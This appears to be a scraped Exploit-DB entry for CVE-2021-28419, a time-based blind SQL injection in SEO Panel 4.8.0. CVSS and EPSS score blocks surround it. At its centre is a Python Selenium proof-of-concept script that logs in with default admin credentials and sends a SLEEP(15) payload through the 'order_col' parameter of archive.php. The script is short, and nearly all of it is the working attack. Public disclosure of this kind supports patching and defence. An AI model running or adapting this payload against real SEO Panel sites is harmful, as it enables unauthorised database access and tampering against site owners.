Lucene search

K
exploitdbNu11secur1tyEDB-ID:49804
HistoryApr 26, 2021 - 12:00 a.m.

SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)

2021-04-2600:00:00
nu11secur1ty
www.exploit-db.com
216

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7 High

AI Score

Confidence

High

0.152 Low

EPSS

Percentile

95.9%

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04/25/2021
# Vendor: https://www.seopanel.org/
# Link: https://www.seopanel.org/spdownload/4.8.0
# CVE: CVE-2021-28419

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28419

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/seopanel/login.php"

#enter your login username
username="spadmin"

#enter your login password
password="spadmin"

#enter the element for username input field
element_for_username="userName"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"


browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit
browser.get(("
http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT
7397 FROM
(SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1"))

print("payload is deployed MySQL is not responding correctly...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

7 High

AI Score

Confidence

High

0.152 Low

EPSS

Percentile

95.9%